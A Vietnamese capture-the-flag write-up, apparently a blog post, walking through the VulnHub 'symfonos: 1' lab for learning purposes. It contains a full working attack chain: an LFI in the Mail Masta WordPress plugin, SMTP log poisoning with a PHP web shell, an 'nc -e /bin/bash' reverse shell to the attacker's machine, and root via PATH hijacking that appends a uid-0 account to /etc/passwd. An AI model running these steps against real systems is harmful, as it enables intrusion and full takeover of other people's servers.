+4

VulnHub CTF - symfonos: 1 - Vẫn là một vài plugin của Wordpress, cẩn thận khi sử dụng plugin bên Wordpress - SMTP - Từ LFI cho đến Remote Code Excecution

Mở đầu

 • Lại là mình đây, vào mấy hôm rảnh rỗi lại mò vào vulhub.com để kiếm mấy bài lab để học hỏi, kiếm được bài Difficulty: Beginner nên build lên làm luôn xem nó có Beginner không ✌️
 • Đây là một bài lab khá mới của tác giả Zayotic trong series symfonos.
 • Link bài lab nếu ai muốn khám phá: symfonos: 1

Tấn công

 • Việc đầu tiên vẫn như thường ngày, build bài lab lên rồi quét địa chỉ ip của nó. Ở đây mình sử dụng arp-scan để quét cho nhanh.

  root@kali: arp-scan -l
  Interface: eth0, datalink type: EN10MB (Ethernet)
  Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
  192.168.19.34	00:0c:29:a0:2f:e9	VMware, Inc.
  

 • Web gì thế này, có mỗi cái ảnh là sao, tôi là ai, đây là đâu 😱😱😱😱

 • Thử scan tất cả cổng trên này xem sao

  root@kali:~/Desktop# nmap -p- -A 192.168.19.34
  Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 14:56 +07
  Nmap scan report for symfonos.local (192.168.19.34)
  Host is up (0.00077s latency).
  Not shown: 65530 closed ports
  PORT  STATE SERVICE   VERSION
  22/tcp open ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
  | ssh-hostkey: 
  |  2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
  |  256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
  |_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
  25/tcp open smtp    Postfix smtpd
  |_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
  | ssl-cert: Subject: commonName=symfonos
  | Subject Alternative Name: DNS:symfonos
  | Not valid before: 2019-06-29T00:29:42
  |_Not valid after: 2029-06-26T00:29:42
  |_ssl-date: TLS randomness does not represent time
  80/tcp open http    Apache httpd 2.4.25 ((Debian))
  |_http-server-header: Apache/2.4.25 (Debian)
  |_http-title: Site doesn't have a title (text/html).
  139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
  MAC Address: 00:0C:29:A0:2F:E9 (VMware)
  Device type: general purpose
  Running: Linux 3.X|4.X
  OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  OS details: Linux 3.2 - 4.9
  Network Distance: 1 hop
  Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  TRACEROUTE
  
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 16.08 seconds
  
 • Con máy này đang sử dụng dịch vụ mail smtp, có samba kìa, thử vào xem có gì k

 • Có thư mục anonymous, vào mở thì thấy có một tin nhắn của thần Zeus =))

  Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 
  
  Next person I find using one of these passwords will be fired!
  
  -Zeus
  
 • Thử mấy cái epidioko, qwerty với baseball xem thần Zeus có block thật hay không ✌️

 • Thử được thư mục helios có mật khẩu là qwerty thật 😂

 • Có 2 mẩu tin ở đây

 • file research.txt:

  Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
  
 • file todo.txt:

  1. Binge watch Dexter
  2. Dance
  3. Work on /h3l105
  
 • Humm, thử vào http://192.168.19.34/h3l105 xem sao. (À quên, add 192.168.19.34 symfonos.local vào /etc/hosts đã)

 • 1 trang Wordpress

 • Sử dụng wpscan thì thấy có lỗi như sau:

  root@kali:~# wpscan --url http://symfonos.local/h3l105/ --plugins-detection aggressive
  [+] mail-masta
   | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
   | Latest Version: 1.0 (up to date)
   | Last Updated: 2014-09-19T07:52:00.000Z
   | Readme: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
   | [!] Directory listing is enabled
   |
   | Detected By: Known Locations (Aggressive Detection)
   |
   | [!] 2 vulnerabilities identified:
   |
   | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
   |   References:
   |   - https://wpvulndb.com/vulnerabilities/8609
   |   - https://www.exploit-db.com/exploits/40290/
   |   - https://cxsecurity.com/issue/WLB-2016080220
   |
   | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
   |   References:
   |   - https://wpvulndb.com/vulnerabilities/8740
   |   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
   |   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
   |   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
   |   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
   |   - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
   |
   | Version: 1.0 (100% confidence)
   | Detected By: Readme - Stable Tag (Aggressive Detection)
   | - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
   | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
   | - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
  
 • Đọc một hồi về plugin mail-masta thì ở đây có dính Local File Inclusion (LFI)

  http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

 • Ở file /etc/passwd ta xác định được có những user sau

  root
  helios
  mysql
  zeus
  wordpress
  
 • Check lại bằng smtp-user-enum thì có đúng 3 users này có mail.

  root@kali:~# smtp-user-enum -M VRFY -U users.txt -t 192.168.19.34
  Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
  
   ----------------------------------------------------------
  |          Scan Information            |
   ----------------------------------------------------------
  
  Mode ..................... VRFY
  Worker Processes ......... 3
  Usernames file ........... users.txt
  Target count ............. 1
  Username count ........... 3
  Target TCP port .......... 25
  Query timeout ............ 3 secs
  Target domain ............ 
  
  ######## Scan started at Wed Jul 10 16:07:52 2019 #########
  192.168.19.34: root exists
  192.168.19.34: helios exists
  192.168.19.34: mysql exists
  ######## Scan completed at Wed Jul 10 16:07:53 2019 #########
  3 results.
  
 • Chắc hẳn là phải có thư mục chứa mail, mình có thể đọc được mail người khác gửi đến helios

 • Thử gửi thư với payload cho helios xem sao

  root@kali:~# telnet 192.168.19.34 25
  Trying 192.168.19.34...
  Connected to 192.168.19.34.
  Escape character is '^]'.
  220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
  HELO localhost
  250 symfonos.localdomain
  MAIL FROM: tuan@symfonos.localdomain
  250 2.1.0 Ok
  RCPT TO: helios
  250 2.1.5 Ok
  DATA
  354 End data with <CR><LF>.<CR><LF>
  <?php system($_GET['c']); ?>
  
 • Giờ ta sử dụng đường dẫn sau để kiểm tra xem sao:

  view-source:http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=id

 • Ok thành công rồi, chúng ta đã có 1 chú shell =))

 • Tiếp theo thì ta remote đến nó thôi

 • Đầu tiên thì mở nc -lvp 4444 bên máy mình đã

 • Sử dụng http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc -e /bin/bash -nv 192.168.19.100 4444 để remote ngược về.

 • Ngon, chúng ta đã có máy victim rồi ✌️

  helios@symfonos:/home$ find / -perm -u=s 2>/dev/null
  find / -perm -u=s 2>/dev/null
  /usr/lib/eject/dmcrypt-get-device
  /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  /usr/lib/openssh/ssh-keysign
  /usr/bin/passwd
  /usr/bin/gpasswd
  /usr/bin/newgrp
  /usr/bin/chsh
  /usr/bin/chfn
  /opt/statuscheck
  /bin/mount
  /bin/umount
  /bin/su
  /bin/ping
  helios@symfonos:/home$ 
  
 • Có vẻ như /opt/statuscheck có thể khai thác được, thử run nó lên xem có gì k

  helios@symfonos:/opt$ ./statuscheck
  ./statuscheck
  HTTP/1.1 200 OK
  Date: Thu, 11 Jul 2019 01:49:50 GMT
  Server: Apache/2.4.25 (Debian)
  Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
  ETag: "148-58c6b9bb3bc5b"
  Accept-Ranges: bytes
  Content-Length: 328
  Vary: Accept-Encoding
  Content-Type: text/html
  
 • Humm, nó chỉ kiểm tra cái trang web có Ok hay k, thử chạy strings /opt/statuscheck thì ra 1 đoạn này

  curl -I H
  http://lH
  ocalhostH
  

  Dịch ra sẽ là:

  curl -I http://localhost
  
 • Chúng ta cần khám phá được lệnh thực thi này

 • Có vài phương thức, nhưng ở trong trường hợp này, dựa trên đầu ra curl ... nó đang thực thi với đường dẫn tương đối của nó, có nghĩa là, với đường dẫn có trong biến môi trường $PATH

  PATH ABSOLUTE: /usr/bin/curl
  PATH RELATIVELY: curl
  
 • Việc của chúng ta bây giờ là phải thay đổi biến $PATH của helios và chuyển hướng của chương trình statuscheck sang một thứ mà ta có thể kiểm soát được. Thay vì chạy trong /usr/bin/curl, ta sẽ điều hướng về để nó thực thi trong /tmp/curl chẳng hạn.

 • Giờ chúng ta vào thư mục /tmp rồi tạo 1 file curl, trong file đó có thứ mình muốn để nó chạy lên với quyền root, vì khi chạy /opt/statuscheck, nó sẽ kích hoạt quyền root lên. Và với cái curl giả kia, bạn có thể chạy quyền root với nội dung là bên trong cái file curl vừa tạo.

 • Ở đây mình sẽ chọn cách thêm luôn 1 tài khoản root vào hệ thống.

 • Cấu trúc của file /etc/passwd: username:password_crypt:user_id:group_id:name:home_directory:shell

 • Vậy giờ mình sẽ tạo 1 file như này : minhtuan:x:0:0:root:/root:/usr/bin/bash với x là mật khẩu được crypt.

  Mình sẽ sử dụng perl để crypt password.

  root@kali:~# perl -e 'print crypt("minhtuanact", "ahihi")'
  ahd.h7gFshGUw
  
 • Vậy ahd.h7gFshGUwpassword crypt, hoàn thiện đoạn thêm user kia sẽ là:

  minhtuan:ahd.h7gFshGUw:0:0:root:/root:/usr/bin/bash
  
 • Giờ sẽ ghi vào file /tmp/curl với nội dung sẽ là

  echo minhtuan:ahd.h7gFshGUw:0:0:root:/root:/bin/bash >> /etc/passwd
  

  Lệnh này nó sẽ thêm cái tài khoản của mình mới tạo kia vào /etc/passwd. Giờ sẽ phải đánh lừa statuscheck để nó chạy cái thằng curl giả kia lên rồi đăng nhập với tài khoản vừa tạo là xong ✌️

 • Xúc thôi ✌️

  helios@symfonos:/tmp$ export PATH=/tmp
  export PATH=/tmp
  helios@symfonos:/tmp$ /opt/statuscheck
  /opt/statuscheck
  sh: 1: curl: Permission denied
  helios@symfonos:/tmp$ 
  
 • Ơ Permission denied, à chết quên chưa cấp quyền cho file curl 😂

  helios@symfonos:/tmp$ export PATH=$PATH_BACKUP
  export PATH=$PATH_BACKUP
  helios@symfonos:/tmp$ chmod +x curl
  chmod +x curl
  helios@symfonos:/tmp$ export PATH=/tmp
  export PATH=/tmp
  helios@symfonos:/tmp$ /opt/statuscheck
  /opt/statuscheck
  helios@symfonos:/tmp$ 
  
 • Ok rồi, thử switch sang tài khoản vừa được tạo xem (trước tiên phải chạy export PATH=$PATH_BACKUP trước nhé, không là k có lệnh thực thi đâu)

  helios@symfonos:/tmp$ su minhtuan
  su minhtuan
  Password: minhtuanact
  root@symfonos:/tmp# id
  id
  uid=0(root) gid=0(root) groups=0(root)
  
 • Vậy là ta đã có quyền root rồi. Đọc cờ cuối thôi

Tổng kết

 • Bài này ở mức độ Beginner nhưng mình chẳng thấy nó Beginner tý nào lắm 😂😂
 • Mong các bạn có thể học hỏi được gì thông qua bài này. Nếu các bạn cảm thấy hay thì cho mình 1 upvote nhé 😄

All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.